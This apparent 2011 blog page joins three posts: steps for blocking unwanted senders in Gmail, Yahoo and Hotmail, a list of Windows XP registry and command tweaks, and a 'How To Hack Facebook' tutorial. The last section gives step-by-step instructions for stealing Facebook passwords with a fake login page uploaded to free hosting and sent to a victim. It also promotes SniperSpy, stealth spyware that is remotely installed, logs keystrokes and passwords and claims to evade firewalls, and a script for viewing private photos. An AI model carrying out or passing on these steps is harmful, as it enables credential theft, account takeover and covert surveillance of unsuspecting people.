Monday, 13 June 2011

How to Block Unwanted Emails

Emails are an important part of our lives. So here we tell you how to block those unwanted emails from reaching your mailbox. Depending on the type of the email service you use, there are different ways to block them. We will be considering only the popular ones. We would discuss how to block unwanted emails in Gmail, Yahoo and Hotmail.

1. Gmail

This is an email service from Google and is most popular today.Follow these steps carefully:
a. Sign in your mailbox
b. Click on the Create Filter link right next to the search box on the top of your incoming mails in the inbox
c. Fill out the proper keyword that you think that might be in the email. The simple and best method to achieve this is copy the name of the sender and paste there. For example to stop receiving emails from dummy@gmail.com is to copy “dummy@gmail.com” and paste it into the filter box.
create filter in gmail

d. Click on the Next Step
e. Now select Delete option from the choices that are given. The sent email will be sent directly to the trash.
f. Click on the Create Filter to apply the new settings
email filter in gmail

2. YahooMail

This service is the oldest in the history. The following steps will block the unwanted messages.
a. Login to your email account
b. Click on the Options that is situated on the top-right corner
c. From there you will get a drop down menu where you select the Mail Options
yahoo mail

d. In the left hand side there is a panel where there are multiple options for you. Select the spam out of it.
e. On clicking spam, a screen will appear where you select the Blocked Email Addresses and type in those ids which are unwanted by you
block spam email

f. Finally Save these settings to block the unwanted emails

3. Hotmail

Another popular email service and it belongs to Microsoft. Follow these steps to block emails
a. Login to your account
b. Click on the options link that is located on the top right corner
c. A drop down list will appear and then select t-the Mail Options from it
hotmail spam

d. Select the Safe and Blocked Sender link
manage account

e. Select the Blocked Senders link
block list

f. Now enter the undesirable email ids or domains from where you no longer wish to receive emails.
block email

Cool windows xp tips, tricks & hacks

windows-xp
We all know how famous is windows xp, There are so many tricks to explore like adding some buttons to right click etc.., To do these tricks you do not require any external softwares. So lets explore some of the tricks and hacks.


Note: Some of the tricks may require administrative privileges and may also require to modify your windows registry, So please make a back up of your registry.

1) Add "Open New Window" to right click:
The trick to do is pretty clear and simple. Just navigate to Registry by Start > Run > type regedit.
- From the opened registry window navigate to "HKEY_CLASSES_ROOT\Directory\shell".
- Now right click on "shell" and select "key" and create a new key named "Open in New Window".
- Now right click on "Open in New Window" and create a sub key named "Command".
- Now in the right window double click on "default" and set the value data as "explorer %1"

open in new window

That's it you're done. In any case if you wish to undo the changes just delete the created values.
2) Add item to "SendTo" menu:
This more simple trick which don't require any registry editing
- Simply navigate to My Computer > double-click the drive where Windows is installed, which is usually drive C.
- Double-click Documents and Settings" and again Double-click "particular user(in my case it is "vamsi")".
- Now open "SendTo" folder and create a new shortcut by Right click on blank space > New > Shortcut.
- Click "Browse" and select a "Drive/Folder/File" to add to "SendTo" menu.
- Click "Finish" and you're done.

Add item to send to

add item to sento list

Note: Generally the "SendTo" folders is kept hidden by default, To unhide the folder just go to "Documents and Settings" and navigate to Tools > Folder Options and check the radio button "Show hidden files and folders". Now you can see all the hidden files and folders.(Click here to see How to image)

3) Clear "Open With" menu:
When you right click on a file or program and select "Open With" you will see a bunch of programs to open a program, One time or other you may see unwanted recommended programs list in open with. Fortunately their is a way to to clean.
In windows xp the "open with" listing of a file type is stored in

"HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ FileExts \\ OpenWithList

"HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ FileExts \ \ OpenWithProgIDs

"HKEY_CLASSES_ROOT\.\ OpenWithList

"HKEY_CLASSES_ROOT\.\ OpenWithProgIDs

"HKEY_CLASSES_ROOT\SystemFileAssociations\\OpenWithList


clear open with list
clear open with list 2


So, Now you know the registry locations, If you want to remove any unwanted listing select the progid in right pan and right click on it and click delete.

4) View Thumbnails bigger in XP:
This is small registry hack by which you can make your thumbnails bigger in windows xp.
- Open Registry by Start > Run > type regedit.
- Navigate to "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer"
- Now look for the DWORD value "ThumbnailSize".
- If you find the DWORD value skip this step aand if you din't find the value follow this step. Right click on the right-pan "New > DWORD value > name it as "ThumbnailSize"(No spaces between the name).
- Now double click on "ThumbnailSize" now enter the "value data" of your own.


increase thumbnail size


Note: If you choose the base as Decimal then the min value is 32 and max is 256, If you use Hexadecimal the min is 20 and max is 100.
That's it it your are good to change the default thumbnail size in XP.

5) Manage windows XP start-up:
If you many programs at windows start-up it may slow down you system performance so remove some unwanted start-up programs which in return gives you faster booting time an good system performance.
- Open System Configuration Utility" by Start > Run > type msconfig.
- Now click in "Start up" tab and deselect unwanted programs and click ok.
That's it your done with removing unwanted programs at start-up.


xp start up

Note: To modify these setting you may require administrative privileges.

6) Remove shortcut arrow:
You may be wondered about how to remove shortcut arrow from desktop icons, please follow the steps ;-)
- Open Registry by Start > Run > type regedit.
- Navigate to "HKEY_CLASSES_ROOT\lnkfile" (l = L and not i)
- just delete the DWORD value "IsShortcut"


remove shortcut arrow

You're done.

7) End Unresponsive tasks automatically:
It is very frustrating when the system freezes due to unresponsive programs and you have to wait until the system is online or until you end the unresponsive task. As for me it is good to end the unresponsive task automatically after some milliseconds, So to do that follow this steps.
- Open Registry by Start > Run > type regedit.
- Navigate to "HKEY_CURRENT_USER/Control Panel/Desktop"
- Double-click on "AutoEndTasks" and change the "value data" to "1".


auto end tasks


- Now Double-click on "WaitToKillAppTimeout" and change the "value data" to number of milliseconds you want XP to wait before terminating the unresponsive application. Then, click OK.

set time to auto end tasks

That's it your done.

8)Limit the system usage time of a particular user:
If you wish to set a time-limit to a particular user use this,
- Open Command prompt by Start > Run > type cmd.
- Now use this command "net user /time:
Example: net user vamsi /time:M-F, 08:00-20:00
By this you can let a user called "vamsi" to login from Monday to Friday on 8AM - 8PM or you can also specify single days like this
"net user vamsi /times:M-F,5am-8pm;Sa,11am-12pm;Su,6am-12am"
If you wish to disable this time limit just follow this command
"net user accountname/times:all"
That's it you'r done.
Note: Specify the days as "M,T,W,Th,F,Sa,Su"

9)Disable "Send Error Report":
To disable "send error report to microsoft" every time a program crashes do this,
- Open control panel > Performance and Maintenance > System.
- Now click on advanced tab > Error Reporting.
- Now check the radio button "Disable Error Reporting" and click ok.


disable error reporting

10) Create your own logon massege:
To create your own logon meassege folloe these steps,
- Open Registry by Start > Run > type regedit.
- Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon"
- Now Right-click LegalNoticeCaption > click Modify > type your caption and then click OK.
- Now Right-click LegalNoticeText > click Modify > type your message and then click OK.

custom logon message - legal notice caption
custom logon message - legal notice text

That's it you done.

Caution: Please make a back-up of your registry before editing/modifying your registry.

How To Hack Facebook

Wanna to learn how to hack facebook. This is complete step by step tutorial that explains how to hack facebook with fake login page, how to hack facebook with sniper spy and how to hack facebook to view private pictures .

1) How To Hack Facebook – Phishing

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages. So , we’ll create login page that resemble the original facebook login page. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away.

Step 1

Download fake facebook login page from this link . Upload all downloaded files to web hosting that supports php language, . I recommend 000webhost.com , it’s free and has all what you need.

Step 2

Login to your web hosting and upload files to root folder (root folder in 000webhost is /public_html), if you want to upload it to other folder then you’ll need to change facebook.htm code , action=”/login.php” , replace with action=”/yourFolder/login.php”. Below are instructions how to upload files to 000webhost.com , for other web hosting services is similar. Launch Cpanel , go to File Manager and upload.

Step 3

Select FacebookPasswords.htm and Pass.php and click on Chmod. Set the permissions to 777

That is it. Send url of the fake facebook login page to the person you want to hack .

2) How To Hack Facebook – Sniper Spy (Remote Install Supported)

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access! Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel! This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!

SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes

4. Records any Password (Email, Login, Instant Messenger etc.)

5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall

What if i dont have physical acess to victims computer?

No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.
This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.
The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.

Why would I need SniperSpy?

Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can’t get to your computer and are worried about the Internet safety or habits of those using it, then you NEED SniperSpy.
This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).


DOWNLOAD SNIPER SPY

3) How To Hack Facebook – View Private Pictures

This hack will enable you to view private pictures in facebook by adding a link above photos to see them in their albums, even if you’re not their friend. We’ll be using Greasemonkey script for firefox.

This hack will add a link above such photos with a link saying “See this Photo in its Album”. Clicking this link will reload the photo, but you’ll be viewing it inside the album that you couldn’t view without this hack.
When you’re viewing a photo that is in an album like this, the script (Greasemonkey script) will now add a link above the photo that says “Back to Album”. This will remove the photo from the page and load a thumbnail gallery of all photos in the album.

When viewing all photos of a user, on the page that shows photos of them and their albums etc., a link is added at the top to view all photos of them on one page.
This script however cannot get around Facebook’s security, so you will not be able to view photos that you can’t otherwise view.
Before I teach you how to apply this hack, I’ll be assuming that you are using Firefox Browser and have Greasemonkey script addon installed on it.

Click here to download Greasemonkey Script addon for firefox.

After you are done installing Greasemonkey Script, restart your firefox.

Now download the following script by clicking on the link below:

DOWNLOAD SCRIPT

When you click the link above, you’ll be welcomed to the screen similar this:

Click on Install, restart firefox if needed. Now the script you applied will be working forever.